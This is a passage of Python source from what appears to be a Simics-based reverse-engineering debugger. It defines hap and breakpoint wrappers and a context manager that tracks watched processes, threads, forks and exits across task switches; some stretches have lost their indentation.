        if self.handle is not None and self.hap_num is not None:
            print('hap_handle: %d num: %d name: %s' % (self.handle, self.hap_num, self.name))
            for bp in self.breakpoint_list:
                bp.show()
    def hapAlone(self, (bs, be)):
        # deferred registration (via SIM_run_alone) of a range callback over
        # the first/last breakpoints of the list
        #self.lgr.debug('GenHap alone set hap_handle %s name: %s ...' % (str(self.handle), self.name))
        self.hap_num = SIM_hap_add_callback_range(self.hap_type, self.callback, self.parameter, bs.break_num, be.break_num)
        #self.lgr.debug('GenHap alone set hap_handle %s assigned hap %s ...' % (str(self.handle), str(self.hap_num)))
    def set(self, immediate=True):
        ''' NOTE: different calls to SIM_brekapoint below '''
        # multiple breakpoints: arm each one, then register a single range hap
        if len(self.breakpoint_list) > 1:
            for bp in self.breakpoint_list:
                bp.break_num = SIM_breakpoint(bp.cell, bp.addr_type, bp.mode, bp.addr, bp.length, bp.flags)
                if bp.prefix is not None:
                    command = 'set-prefix %d "%s"' % (bp.break_num, bp.prefix)
                    SIM_run_alone(SIM_run_command, command)
                    #self.lgr.debug('contextManager prefix cmd: %s' % command)
                self.lgr.debug('GenHap breakpoint created for hap_handle %d assigned breakpoint num %d' % (self.handle, bp.break_num))
            bs = self.breakpoint_list[0]
            be = self.breakpoint_list[-1]
            #self.lgr.debug('GenHap callback range')
            if immediate:
                #self.lgr.debug('GenHap set hap_handle %s name: %s ...' % (str(self.handle), self.name))
                self.hap_num = SIM_hap_add_callback_range(self.hap_type, self.callback, self.parameter, bs.break_num, be.break_num)
                #self.lgr.debug('GenHap set hap_handle %s assigned hap %s ...' % (str(self.handle), str(self.hap_num)))
            else:
                SIM_run_alone(self.hapAlone, (bs, be))
        # single breakpoint: arm it and register an index hap
        elif len(self.breakpoint_list) == 1:
            bp = self.breakpoint_list[0]
            #self.lgr.debug('bp.cell is %s addr %s' % (str(bp.cell), str(bp.addr)))
            if bp.addr is None:
                self.lgr.error('contextManager, set bp.addr is none')
                return
            bp.break_num = SIM_breakpoint(bp.cell, bp.addr_type, bp.mode, bp.addr, bp.length, bp.flags)
            if bp.prefix is not None:
                command = 'set-prefix %d "%s"' % (bp.break_num, bp.prefix)
                SIM_run_alone(SIM_run_command, command)
                #self.lgr.debug('contextManager prefix cmd: %s' % command)
            #self.lgr.debug('GenHap set hap_handle %s name: %s on break %s (0x%x) break_handle %s' % (str(self.handle),
            #          self.name, str(bp.break_num), bp.addr, str(bp.handle)))
            self.hap_num = SIM_hap_add_callback_index(self.hap_type, self.callback, self.parameter, bp.break_num)
            #self.lgr.debug('GenHap set hap_handle %s assigned hap %s on break %s' % (str(self.handle), str(self.hap_num), str(bp.break_num)))
        else:
            self.lgr.error('GenHap, no breakpoints')
    def clear(self, dumb=None):
        # dumb: unused; signature allows use as a SIM_run_alone callback
        if self.hap_num is not None:
            for bp in self.breakpoint_list:
                bp.clear()
            SIM_hap_delete_callback_id(self.hap_type, self.hap_num)
            #self.lgr.debug('GenHap clear hap %d handle %d' % (self.hap_num, self.handle))
            self.hap_num = None
class GenContextMgr():
    def __init__(self, top, cell_name, task_utils, param, cpu, lgr):
        """Per-cell context manager: creates the RESim context for this cell
        and initializes all breakpoint/hap/task-watch bookkeeping."""
        self.top = top
        self.cell_name = cell_name
        self.task_utils = task_utils
        self.param = param
        # NOTE(review): task_utils is assigned twice — harmless duplicate
        self.task_utils = task_utils
        self.mem_utils = task_utils.getMemUtils()
        self.debugging_pid = None
        self.debugging_pid_saved = None
        self.debugging_comm = None
        self.debugging_cell = None
        self.cpu = cpu
        self.pageFaultGen = None
        ''' watch multiple tasks, e.g., threads '''
        self.watch_rec_list = {}
        self.watch_rec_list_saved = {}
        self.pending_watch_pids = []
        self.nowatch_list = []
        self.watching_tasks = False
        self.single_thread = False
        self.lgr = lgr
        self.ida_message = None
        self.exit_break_num = None
        self.exit_cb_num = None
        self.phys_current_task = task_utils.getPhysCurrentTask()
        self.task_break = None
        self.task_hap = None
        # GenBreakpoint / GenHap records managed by this cell
        self.breakpoints = []
        self.haps = []
        # monotonically increasing handle counters (see nextBreakHandle/nextHapHandle)
        self.break_handle = 0
        self.hap_handle = 0
        self.text_start = None
        self.text_end = None
        self.catch_pid = None
        self.catch_callback = None
        self.watch_only_this = False
        ''' used with afl '''
        self.callback = None
        self.exit_callback = None
        ''' experiment with tracking task switches among watched pids '''
        self.task_switch = {}
        # the cell's default context, plus a dedicated RESim_<cell> context used
        # while a debugged process is scheduled
        obj = SIM_get_object(cell_name)
        self.default_context = obj.cell_context
        context = 'RESim_%s' % cell_name
        cmd = 'new-context %s' % context
        SIM_run_command(cmd)
        obj = SIM_get_object(context)
        self.resim_context = obj
        self.lgr.debug('context_manager cell %s resim_context defined as obj %s' % (self.cell_name, str(obj)))
        ''' avoid searching all task recs to know if pid being watched '''
        self.pid_cache = []
        self.group_leader = None
        ''' watch pointers to task recs to catch kills '''
        self.task_rec_hap = {}
        self.task_rec_bp = {}
        self.task_rec_watch = {}
        ''' avoid multiple calls to taskRecHap '''
        self.demise_cache = []
        ''' used by pageFaultGen to supress breaking on apparent kills '''
        self.watching_page_faults = False
def getRealBreak(self, break_handle):
for hap in self.haps:
for bp in hap.breakpoint_list:
if bp.handle == break_handle:
return bp.break_num
return None
def getBreakHandle(self, real_bp):
for hap in self.haps:
#self.lgr.debug('getBreakHandle hap %s' % (hap.name))
for bp in hap.breakpoint_list:
#self.lgr.debug('getBreakHandle look for %d got %d' % (real_bp, bp.break_num))
if bp.break_num == real_bp:
return bp.handle
return None
def showHaps(self):
self.lgr.debug('contextManager showHaps')
for hap in self.haps:
hap.show()
#def getRESimContext(self):
# return self.debugging_cell
def recordText(self, start, end):
self.lgr.debug('contextMgr recordText 0x%x 0x%x' % (start, end))
self.text_start = start
self.text_end = end
def getText(self):
return self.text_start, self.text_end
def nextHapHandle(self):
self.hap_handle = self.hap_handle+1
return self.hap_handle
def nextBreakHandle(self):
self.break_handle = self.break_handle+1
return self.break_handle
    def genBreakpoint(self, cell, addr_type, mode, addr, length, flags, prefix=None):
        ''' create a GenContextManager breakpoint. This is not yet set.
            Determine if the context should be resim, e.g., only when one of our
            debugging processes is scheduled.
        '''
        handle = self.nextBreakHandle()
        # linear breakpoints set while debugging are bound to the RESim context
        # so they only fire when a watched thread is scheduled
        if self.debugging_pid is not None and addr_type == Sim_Break_Linear:
            cell = self.resim_context
            #self.lgr.debug('gen break with resim context %s' % str(self.resim_context))
        bp = GenBreakpoint(cell, addr_type, mode, addr, length, flags, handle, self.lgr, prefix=prefix)
        self.breakpoints.append(bp)
        #self.lgr.debug('genBreakpoint handle %d number of breakpoints is now %d prefix %s' % (handle, len(self.breakpoints), prefix))
        return handle
    def genDeleteBreakpoint(self, handle):
        ''' Intentionally a no-op: breakpoint deletion is handled by GenHap.clear()
            via genDeleteHap (see the retained commented-out implementation). '''
        #self.lgr.debug('genDeleteBreakpoint handle %d -- do not delete, will be done in GenHap' % handle)
        #for bp in self.breakpoints:
        #    if bp.handle == handle:
        #        bp.clear()
        #        self.breakpoints.remove(bp)
        #        return
        #self.lgr.debug('genDeleteBreakpoint could not find break handle %d' % handle)
        pass
    def genDeleteHap(self, hap_handle, immediate=False):
        ''' Delete the hap with the given handle along with its breakpoints.
            When immediate is False the Simics teardown is deferred via
            SIM_run_alone; the bookkeeping lists are updated either way. '''
        if hap_handle is None:
            self.lgr.warning('genDelteHap called with handle of none')
            return
        #self.lgr.debug('genDeleteHap hap_handle %d' % hap_handle)
        # iterate over a copy so the removal below is safe
        hap_copy = list(self.haps)
        for hap in hap_copy:
            if hap.handle == hap_handle:
                if immediate:
                    hap.clear(None)
                else:
                    SIM_run_alone(hap.clear, None)
                #self.lgr.debug('num breaks in hap %d is %d' % (hap_handle, len(hap.breakpoint_list)))
                for bp in hap.breakpoint_list:
                    if bp in self.breakpoints:
                        #self.lgr.debug('removing bp %d from hap_handle %d break_num %s' % (bp.handle, hap_handle, str(bp.break_num)))
                        self.breakpoints.remove(bp)
                    else:
                        self.lgr.warning('genDeleteHap bp not in list, handle %d ' % (bp.handle))
                #self.lgr.debug('genDeleteHap removing hap %d from list' % hap.handle)
                self.haps.remove(hap)
                return
        #self.lgr.debug('genDeleteHap could not find hap_num %d' % hap_handle)
    def genHapIndex(self, hap_type, callback, parameter, handle, name=None):
        ''' Create a GenHap tied to the breakpoint identified by the given
            break handle.  Returns the new hap handle, or (implicitly) None
            if the break handle is unknown. '''
        #self.lgr.debug('genHapIndex break_handle %d' % handle)
        for bp in self.breakpoints:
            if bp.handle == handle:
                hap_handle = self.nextHapHandle()
                hap = GenHap(hap_type, callback, parameter, hap_handle, self.lgr, [bp], name)
                self.haps.append(hap)
                return hap.handle
        #self.lgr.error('genHapIndex failed to find break %d' % breakpoint)
    def genHapRange(self, hap_type, callback, parameter, handle_start, handle_end, name=None):
        ''' Create one GenHap covering every breakpoint whose handle falls
            between handle_start and handle_end (inclusive).  Returns the new
            hap handle, or (implicitly) None if handle_end is never found. '''
        #self.lgr.debug('genHapRange break_handle %d %d' % (handle_start, handle_end))
        bp_start = None
        bp_list = []
        for bp in self.breakpoints:
            if bp.handle >= handle_start:
                bp_list.append(bp)
            # once the end handle is seen, build the hap over the accumulated list
            if bp.handle == handle_end:
                hap_handle = self.nextHapHandle()
                hap = GenHap(hap_type, callback, parameter, hap_handle, self.lgr, bp_list, name, immediate=False)
                #self.lgr.debug('contextManager genHapRange set hap %s on %d breaks' % (name, len(bp_list)))
                self.haps.append(hap)
                return hap.handle
        #self.lgr.error('genHapRange failed to find break for handles %d or %d' % (breakpoint_start, breakpoint_end))
    def setAllBreak(self):
        ''' Arm every registered breakpoint; also resume page fault tracking
            when a pageFaultGen component has been provided. '''
        for bp in self.breakpoints:
            bp.set()
        if self.pageFaultGen is not None:
            self.pageFaultGen.recordPageFaults()
def setAllHap(self, only_maze_breaks=False):
for hap in self.haps:
if (not only_maze_breaks and hap.name != 'exitMaze') or (only_maze_breaks and hap.name == 'exitMaze'):
hap.set()
    def clearAllBreak(self):
        ''' Called to clear breaks within the resim context '''
        for bp in self.breakpoints:
            #if bp.cell == self.resim_context:
            bp.clear()
        # suspend page fault tracking while our breakpoints are disabled
        if self.pageFaultGen is not None:
            self.pageFaultGen.stopPageFaults()
def clearAllHap(self, keep_maze_breaks=False):
#self.lgr.debug('clearAllHap start')
for hap in self.haps:
if not keep_maze_breaks or hap.name != 'exitMaze':
hap.clear()
#self.lgr.debug('clearAllHap finish')
    def getThreadRecs(self):
        ''' Return the task record addresses of the watched threads (dict key view). '''
        return self.watch_rec_list.keys()
def getThreadPids(self):
retval = []
for rec in self.watch_rec_list:
pid = self.watch_rec_list[rec]
#self.lgr.debug('genContextManager getThreadPids append %d to returned thread pid list' % (pid))
retval.append(pid)
return retval
    def addNoWatch(self):
        ''' only watch maze exits for the current task. NOTE: assumes those are set after call to this function'''
        self.lgr.debug('contextManager cell %s addNoWatch' % self.cell_name)
        if len(self.nowatch_list) == 0 and len(self.watch_rec_list) == 0:
            ''' had not been watching and tasks.  start so we can not watch this one '''
            self.setTaskHap()
            self.watching_tasks=True
            self.lgr.debug('contextManager addNoWatch began watching tasks')
        rec = self.task_utils.getCurTaskRec()
        self.nowatch_list.append(rec)
        self.lgr.debug('contextManager addNoWatch for rec 0x%x' % rec)
        # deferred: clear every hap except the exitMaze haps (keep_maze_breaks=True)
        SIM_run_alone(self.clearAllHap, True)
    def rmNoWatch(self):
        ''' restart watching the current task, assumes it was added via addNoWatch '''
        rec = self.task_utils.getCurTaskRec()
        if rec in self.nowatch_list:
            self.nowatch_list.remove(rec)
            self.lgr.debug('contextManager rmNoWatch, rec 0x%x removed from nowatch list' % rec)
            if len(self.nowatch_list) == 0 and len(self.watch_rec_list) == 0:
                ''' stop all task watching '''
                self.stopWatchTasks()
                # re-arm all haps (False => not only maze breaks), deferred
                SIM_run_alone(self.setAllHap, False)
                self.lgr.debug('contextManager addNoWatch stopped watching tasks, enabled all HAPs')
            else:
                ''' restart watching '''
                SIM_run_alone(self.setAllHap, False)
        else:
            self.lgr.error('contextManager rmNoWatch, rec 0x%x not in nowatch list' % rec)
    def changedThread(self, cpu, third, forth, memory):
        ''' guts of context managment.  set or remove breakpoints/haps 
            depending on whether we are tracking the newly scheduled process '''
        # Fired by the write breakpoint on the "current task" pointer; see setTaskHap.
        if self.task_hap is None:
            return
        # get the value that will be written into the current thread address
        new_addr = SIM_get_mem_op_value_le(memory)
        prev_task = self.task_utils.getCurTaskRec()
        #DEBUG BLOCK
        pid = self.mem_utils.readWord32(cpu, new_addr + self.param.ts_pid)
        comm = self.mem_utils.readString(cpu, new_addr + self.param.ts_comm, 16)
        prev_pid = self.mem_utils.readWord32(cpu, prev_task + self.param.ts_pid)
        prev_comm = self.mem_utils.readString(cpu, prev_task + self.param.ts_comm, 16)
        self.lgr.debug('changeThread from %d (%s) to %d (%s) new_addr 0x%x watchlist len is %d debugging_comm is %s context %s' % (prev_pid, 
            prev_comm, pid, comm, new_addr, len(self.watch_rec_list), self.debugging_comm, cpu.current_context))
        if len(self.pending_watch_pids) > 0:
            ''' Are we waiting to watch pids that have not yet been scheduled?
                We don't have the process rec until it is ready to schedule. '''
            if pid in self.pending_watch_pids:
                self.lgr.debug('changedThread, pending add pid %d to watched processes' % pid)
                self.watch_rec_list[new_addr] = pid
                self.pending_watch_pids.remove(pid)
                self.watchExit(rec=new_addr, pid=pid)
        # Unwatched process with the debug target's comm: decide if it is a
        # clone/fork belonging to the debugged group and should be adopted.
        if pid not in self.pid_cache and comm == self.debugging_comm:
            group_leader = self.mem_utils.readPtr(cpu, new_addr + self.param.ts_group_leader)
            leader_pid = self.mem_utils.readWord32(cpu, group_leader + self.param.ts_pid)
            add_it = False
            if leader_pid in self.pid_cache:
                add_it = True
            elif pid == leader_pid:
                parent = self.mem_utils.readPtr(cpu, new_addr + self.param.ts_real_parent)
                if parent in self.watch_rec_list:
                    parent_pid = self.mem_utils.readWord32(cpu, parent + self.param.ts_pid)
                    self.lgr.debug('contextManager new clone %d is its own leader, but parent %d is in cache.  Call the parent the leader.' % (pid, parent_pid))
                    add_it = True
                    leader_pid = parent_pid
                else:
                    self.lgr.debug('contextManager pid:%d (%s) not in cache, nor is parent in watch_rec_list 0x%x' % (pid, comm, parent))
            if add_it:
                ''' TBD, we have no reason to believe this clone is created by the group leader? Using parent or real_parent is no help'''
                self.lgr.debug('contextManager adding clone %d (%s) leader is %d' % (pid, comm, leader_pid))
                self.addTask(pid, new_addr)
                self.top.addProc(pid, leader_pid, comm, clone=True)
                self.watchExit(new_addr, pid)
                self.top.recordStackClone(pid, leader_pid)
            else:
                self.lgr.debug('contextManager pid:%d (%s) not in cache, group leader 0x%x leader pid %d' % (pid, comm, group_leader, leader_pid))
        elif pid in self.pid_cache and new_addr not in self.watch_rec_list:
            self.lgr.debug('*********** pid in cache, but new_addr not in watch list?  eh?')
        # Transition 1: not watching, but the incoming task should be watched.
        if not self.watching_tasks and \
               (new_addr in self.watch_rec_list or (len(self.watch_rec_list) == 0 and len(self.nowatch_list) > 0)) \
               and not (self.single_thread and pid != self.debugging_pid):
            ''' Not currently watching processes, but new process should be watched '''
            if self.debugging_pid is not None:
                cpu.current_context = self.resim_context
                #self.lgr.debug('resim_context')
            #self.lgr.debug('Now scheduled %d new_addr 0x%x' % (pid, new_addr))
            self.watching_tasks = True
            self.setAllBreak()
            only_maze_breaks = False
            if new_addr in self.nowatch_list:
                only_maze_breaks = True
                #self.lgr.debug('contextManager changedThread, only do maze breaks')
            SIM_run_alone(self.setAllHap, only_maze_breaks)
        # Transition 2: already watching; adjust for maze/unwatched tasks.
        elif self.watching_tasks:
            if prev_task in self.nowatch_list:
                if new_addr not in self.nowatch_list:
                    ''' was watching only maze exits, watch everything but maze'''
                    #self.lgr.debug('was watching only maze, now watch all ')
                    SIM_run_alone(self.clearAllHap, False)
                    SIM_run_alone(self.setAllHap, False)
            elif new_addr in self.nowatch_list:
                ''' was watching everything, watch only maze '''
                #self.lgr.debug('Now only watch maze')
                SIM_run_alone(self.clearAllHap, False)
                SIM_run_alone(self.setAllHap, True)
            elif len(self.watch_rec_list) > 0 and new_addr not in self.watch_rec_list:
                ''' Watching processes, but new process should not be watched '''
                if self.debugging_pid is not None:
                    cpu.current_context = self.default_context
                    #self.lgr.debug('default_context')
                #self.lgr.debug('No longer scheduled')
                self.watching_tasks = False
                #self.auditExitBreaks()
                self.clearAllBreak()
                #if pid not in self.task_switch:
                #    self.task_switch[pid] = []
                #self.task_switch[pid].append(self.cpu.cycles)
                SIM_run_alone(self.clearAllHap, False)
            elif len(self.watch_rec_list) > 0:
                ''' switching between watched pids '''
                #if pid not in self.task_switch:
                #    self.task_switch[pid] = []
                #self.task_switch[pid].append(self.cpu.cycles)
                pass
        # One-shot catch: break the simulation when the requested pid schedules.
        if self.catch_pid == pid:
            self.lgr.debug('contextManager changedThread do catch_callback for pid %d' % pid)
            SIM_break_simulation('in pid %d' % pid)
            #SIM_run_alone(self.catch_callback, None)
            self.catch_pid = None
def catchPid(self, pid, callback):
self.catch_pid = pid
self.catch_callback = callback
    def watchAll(self):
        ''' Resume watching all threads (undoes watchOnlyThis). '''
        self.watch_only_this = False
def watchOnlyThis(self):
ctask = self.task_utils.getCurTaskRec()
cur_pid = self.mem_utils.readWord32(self.cpu, ctask + self.param.ts_pid)
pcopy = list(self.pid_cache)
for pid in pcopy:
if pid != cur_pid:
self.rmTask(pid)
self.watch_only_this = True
    def rmTask(self, pid, killed=False):
        ''' remove a pid from the list of task records being watched.  return True if this is the last thread. '''
        retval = False
        rec = self.task_utils.getRecAddrForPid(pid)
        if rec is None and killed:
            ''' assume record already gone '''
            # find the record by reverse lookup of the pid in our watch list
            for r in self.watch_rec_list:
                if self.watch_rec_list[r] == pid:
                    rec = r
                    self.lgr.debug('contextManager rmTask %d rec already gone, remove its entries' % pid)
                    break
        if rec in self.watch_rec_list:
            del self.watch_rec_list[rec]
            self.lgr.debug('rmTask removing rec 0x%x for pid %d, len now %d' % (rec, pid, len(self.watch_rec_list)))
            if pid in self.pid_cache:
                self.pid_cache.remove(pid)
                self.lgr.debug('rmTask remove %d from cache, cache now %s' % (pid, str(self.pid_cache)))
            # tear down the Simics breakpoint/hap watching this pid's task record
            if pid in self.task_rec_bp and self.task_rec_bp[pid] is not None:
                SIM_delete_breakpoint(self.task_rec_bp[pid])
                self.lgr.debug('contextManger rmTask pid %d' % pid)
                SIM_hap_delete_callback_id('Core_Breakpoint_Memop', self.task_rec_hap[pid])
                del self.task_rec_bp[pid]
                del self.task_rec_hap[pid]
                del self.task_rec_watch[pid]
            if len(self.watch_rec_list) == 0:
                if self.debugging_comm is None:
                    self.lgr.warning('contextManager rmTask debugging_comm is None')
                else:
                    self.lgr.debug('contextManager rmTask watch_rec_list empty, clear debugging_pid')
                #self.debugging_comm = None
                #self.debugging_cell = None
                # other pids with the same comm may exist if the debuggee forked
                pids = self.task_utils.getPidsForComm(self.debugging_comm)
                if len(pids) == 0:
                    self.cpu.current_context = self.default_context
                    self.stopWatchTasks()
                    retval = True
                else:
                    if self.top.swapSOPid(pid, pids[0]):
                        self.lgr.debug('contextManager rmTask, still pids for comm %s, was fork? set dbg pid to %d' % (self.debugging_comm, pids[0]))
                        ''' replace SOMap pid with new one from fork '''
                        self.debugging_pid = pids[0]
                    else:
                        ''' TBD poor hueristic for deciding it was not a fork '''
                        self.cpu.current_context = self.default_context
                        self.stopWatchTasks()
                        retval = True
            elif pid == self.debugging_pid:
                # the debugged thread died; fall back to another cached thread
                self.debugging_pid = self.pid_cache[0]
                self.lgr.debug('rmTask debugging_pid now %d' % self.debugging_pid)
            else:
                self.lgr.debug('rmTask remaining debug recs %s' % str(self.watch_rec_list))
        return retval
    def addTask(self, pid, rec=None):
        ''' Begin watching the given pid.  If its task record is not yet
            known, the pid is queued and picked up by changedThread when it
            is first scheduled. '''
        if rec is None:
            rec = self.task_utils.getRecAddrForPid(pid)
        if rec not in self.watch_rec_list:
            if rec is None:
                #self.lgr.debug('genContextManager, addTask got rec of None for pid %d, pending' % pid)
                self.pending_watch_pids.append(pid)
            else:
                #self.lgr.debug('genContextManager, addTask pid %d add rec 0x%x' % (pid, rec))
                self.watch_rec_list[rec] = pid
                self.watchExit(rec=rec, pid=pid)
            if pid not in self.pid_cache:
                self.pid_cache.append(pid)
        else:
            #self.lgr.debug('addTask, already has rec 0x%x for PID %d' % (rec, pid))
            pass
def watchingThis(self):
ctask = self.task_utils.getCurTaskRec()
dumb, comm, cur_pid = self.task_utils.curProc()
if cur_pid in self.pid_cache or ctask in self.watch_rec_list:
#self.lgr.debug('am watching pid:%d' % cur_pid)
return True
else:
#self.lgr.debug('not watching %d' % cur_pid)
return False
def amWatching(self, pid):
ctask = self.task_utils.getCurTaskRec()
dumb, comm, cur_pid = self.task_utils.curProc()
if pid == cur_pid and (ctask in self.watch_rec_list or len(self.watch_rec_list)==0):
return True
elif pid in self.pid_cache:
return True
else:
return False
def restoreDefaultContext(self):
self.cpu.current_context = self.default_context
self.lgr.debug('contextManager restoreDefaultContext')
def restoreDebugContext(self):
self.cpu.current_context = self.resim_context
self.lgr.debug('contextManager restoreDebugContext')
def restoreDebug(self):
self.debugging_pid = self.debugging_pid_saved
self.watch_rec_list = self.watch_rec_list_saved.copy()
for ctask in self.watch_rec_list:
self.pid_cache.append(self.watch_rec_list[ctask])
self.cpu.current_context = self.resim_context
self.lgr.debug('contextManager restoreDebug set cpu context to resim, debugging_pid to %s' % str(self.debugging_pid))
    def stopWatchTasks(self):
        ''' Stop all task watching: remove the scheduler breakpoint/hap, the
            per-pid exit watches, and revert the cpu to the default context.
            Current watch state is saved so restoreDebug can bring it back. '''
        if self.task_break is None:
            self.lgr.debug('stopWatchTasks already stopped')
            return
        SIM_delete_breakpoint(self.task_break)
        SIM_hap_delete_callback_id("Core_Breakpoint_Memop", self.task_hap)
        self.task_hap = None
        self.task_break = None
        self.watching_tasks = False
        # save state for a later restoreDebug
        self.watch_rec_list_saved = self.watch_rec_list.copy()
        if self.debugging_pid is not None:
            self.debugging_pid_saved = self.debugging_pid
        self.watch_rec_list = {}
        for pid in self.task_rec_bp:
            if self.task_rec_bp[pid] is not None:
                self.lgr.debug('stopWatchTasks delete bp %d' % self.task_rec_bp[pid])
                SIM_delete_breakpoint(self.task_rec_bp[pid])
                SIM_hap_delete_callback_id('Core_Breakpoint_Memop', self.task_rec_hap[pid])
        self.task_rec_bp = {}
        self.task_rec_hap = {}
        self.task_rec_watch = {}
        self.pid_cache = []
        self.debugging_pid = None
        cpu, dumb, dumb2 = self.task_utils.curProc()
        cpu.current_context = self.default_context
        self.lgr.debug('stopWatchTasks reverted %s to default context %s' % (cpu.name, str(self.default_context)))
    def resetWatchTasks(self):
        ''' Intended for use when going back in time '''
        self.lgr.debug('resetWatchTasks')
        # tear down and rebuild all task watching from the current machine state
        self.stopWatchTasks()
        self.watchTasks(set_debug_pid = True)
        if not self.watch_only_this:
            ctask = self.task_utils.getCurTaskRec()
            pid = self.mem_utils.readWord32(self.cpu, ctask + self.param.ts_pid)
            if pid == 1:
                # never watch init/systemd
                self.lgr.debug('resetWatchTasks got leader pid of 1, skip')
                return
            leader_pid = self.task_utils.getGroupLeaderPid(pid)
            pid_list = self.task_utils.getGroupPids(leader_pid)
            for pid in pid_list:
                if pid == 1:
                    self.lgr.debug('resetWatchTasks got pid of 1, skip')
                else:
                    self.addTask(pid)
    def setTaskHap(self):
        ''' Set a physical write breakpoint on the kernel's "current task"
            pointer; changedThread fires on each task switch. '''
        #print('genContextManager setTaskHap debugging_cell is %s' % self.debugging_cell)
        self.task_break = SIM_breakpoint(self.cpu.physical_memory, Sim_Break_Physical, Sim_Access_Write, 
                             self.phys_current_task, self.mem_utils.WORD_SIZE, 0)
        #self.lgr.debug('genContextManager setTaskHap bp %d' % self.task_break)
        self.task_hap = SIM_hap_add_callback_index("Core_Breakpoint_Memop", self.changedThread, self.cpu, self.task_break)
        #self.lgr.debug('setTaskHap cell %s break %d set on physical 0x%x' % (self.cell_name, self.task_break, self.phys_current_task))
def restoreWatchTasks(self):
self.watching_tasks = True
if self.debugging_pid is not None:
self.lgr.debug('contextManager restoreWatchTasks cpu context to resim')
self.cpu.current_context = self.resim_context
    def watchTasks(self, set_debug_pid = False):
        ''' Begin watching the currently scheduled task (and task switches). '''
        if self.task_break is not None:
            #self.lgr.debug('watchTasks called, but already watching')
            return
        ctask = self.task_utils.getCurTaskRec()
        pid = self.mem_utils.readWord32(self.cpu, ctask + self.param.ts_pid)
        if pid == 1:
            #self.lgr.debug('contextManager watchTasks, pid is 1, ignore')
            return
        if self.task_break is None:
            self.setTaskHap()
        self.watching_tasks = True
        self.watchExit()
        # NOTE(review): pageFaultGen is used unguarded here, unlike setAllBreak
        # which checks it for None -- confirm it is always set before this call.
        self.pageFaultGen.recordPageFaults()
        if ctask in self.watch_rec_list:
            self.lgr.debug('watchTasks, current task already being watched')
            return
        self.lgr.debug('watchTasks cell %s watch record 0x%x pid: %d set_debug_pid: %r' % (self.cell_name, ctask, pid, set_debug_pid))
        self.watch_rec_list[ctask] = pid
        if pid not in self.pid_cache:
            self.pid_cache.append(pid)
        group_leader = self.task_utils.getGroupLeaderPid(pid)
        if group_leader != self.group_leader:
            #self.lgr.debug('contextManager watchTasks x set group leader to %d' % group_leader)
            self.group_leader = group_leader
        if set_debug_pid:
            self.setDebugPid()
def changeDebugPid(self, pid):
if pid not in self.pid_cache:
self.lgr.error('contextManager changeDebugPid not in pid cache %d' % pid)
return
self.lgr.debug('changeDebugPid to %d' % pid)
self.debugging_pid = pid
    def singleThread(self, single):
        ''' Restrict watching to only the debugging_pid thread (True/False). '''
        self.single_thread = single
    def setDebugPid(self):
        ''' Make the currently scheduled process the debug target and enter
            the RESim context.  No-op if a debug pid is already set. '''
        if self.debugging_pid is not None:
            self.lgr.debug('contextManager setDebugPid already set to %d' % self.debugging_pid)
            return
        cell, comm, cur_pid = self.task_utils.curProc()
        #self.default_context = self.cpu.current_context
        self.cpu.current_context = self.resim_context
        self.lgr.debug('setDebugPid %d, (%s) resim_context' % (cur_pid, comm))
        self.debugging_pid = cur_pid
        self.debugging_comm = comm
        self.debugging_cell = self.top.getCell()
        if cur_pid not in self.pid_cache:
            self.pid_cache.append(cur_pid)
    def killGroup(self, lead_pid, exit_syscall):
        ''' Handle the death of a thread group.  If lead_pid is the group
            leader, report exit for every cached pid; a same-comm pid not in
            the cache (likely a fork) is re-added afterwards. '''
        self.top.rmDebugExitHap()
        if lead_pid == self.group_leader:
            pids = self.task_utils.getPidsForComm(self.debugging_comm)
            add_task = None
            for p in pids:
                if p not in self.pid_cache:
                    self.lgr.debug('killGroup found pid %d not in cache, was it a fork?' % p)
                    add_task =p
                    break
            self.lgr.debug('contextManager killGroup %d is leader, pid_cache is %s' % (lead_pid, str(self.pid_cache)))
            # iterate a copy; handleExit may alter pid_cache
            cache_copy = list(self.pid_cache)
            for pid in cache_copy:
                ida_msg = 'killed %d member of group led by %d' % (pid, lead_pid)
                exit_syscall.handleExit(pid, ida_msg, killed=True, retain_so=True)
                #self.rmTask(pid, killed=True)
                #if pid in self.demise_cache:
                #    self.demise_cache.remove(pid)
                if self.pageFaultGen is not None:
                    if self.pageFaultGen.handleExit(pid):
                        print('SEGV on pid %d?' % pid)
                        self.lgr.debug('genContextManager SEGV on pid %d?' % pid)
            self.clearExitBreaks()
            if add_task is not None:
                self.addTask(add_task)
        elif self.group_leader != None:
            self.lgr.debug('contextManager killGroup NOT leader.  got %d, leader was %d' % (lead_pid, self.group_leader))
            if self.pageFaultGen is not None:
                self.pageFaultGen.handleExit(lead_pid)
        else:
            self.lgr.debug('contextManager killGroup NO leader.  got %d' % (lead_pid))
            if self.pageFaultGen is not None:
                self.pageFaultGen.handleExit(lead_pid)
    def deadParrot(self, pid):
        ''' who knew? death comes betweeen the breakpoint and the "run alone" scheduling '''
        exit_syscall = self.top.getSyscall(self.cell_name, 'exit_group')
        if exit_syscall is not None and not self.watching_page_faults:
            # NOTE(review): ida_msg is computed but unused since the
            # handleExit call below was commented out.
            ida_msg = 'pid:%d exit via kill?' % pid
            self.lgr.debug('contextManager deadParrot pid:%d rec no longer found call killGroup' % (pid))
            self.killGroup(pid, exit_syscall)
            #exit_syscall.handleExit(pid, ida_msg, killed=True)
        else:
            self.rmTask(pid)
            if self.pageFaultGen is not None:
                self.pageFaultGen.handleExit(pid)
            self.clearExitBreaks()
            self.lgr.debug('contextManager deadParrot pid:%d rec no longer found removed task' % (pid))
        if self.exit_callback is not None:
            self.exit_callback()
    def resetAlone(self, pid):
        ''' Scheduled via SIM_run_alone from taskRecHap: if the pid's task
            record still exists, rebuild its exit watch at the new list
            address; otherwise treat the pid as dead (deadParrot). '''
        self.lgr.debug('contextManager resetAlone')
        dead_rec = self.task_utils.getRecAddrForPid(pid)
        if dead_rec is not None:
            list_addr = self.task_utils.getTaskListPtr(dead_rec)
            if list_addr is not None:
                self.lgr.debug('contextMgr resetAlone rec 0x%x of pid %d still found though written by maybe not dead after all?  new list_addr is 0x%x' % (dead_rec, 
                     pid, list_addr))
                SIM_delete_breakpoint(self.task_rec_bp[pid])
                del self.task_rec_bp[pid]
                SIM_hap_delete_callback_id("Core_Breakpoint_Memop", self.task_rec_hap[pid])
                del self.task_rec_hap[pid]
                del self.task_rec_watch[pid]
                self.watchExit(rec=dead_rec, pid = pid)
            else:
                self.lgr.debug('contextMgr resetAlone rec 0x%x of pid %d EXCEPT new list_addr is None call deadParrot' % (dead_rec, pid))
                self.deadParrot(pid)
        else:
            self.lgr.debug('contextMgr resetAlone pid %d no record for pid, call deadParrot' % (pid))
            self.deadParrot(pid)
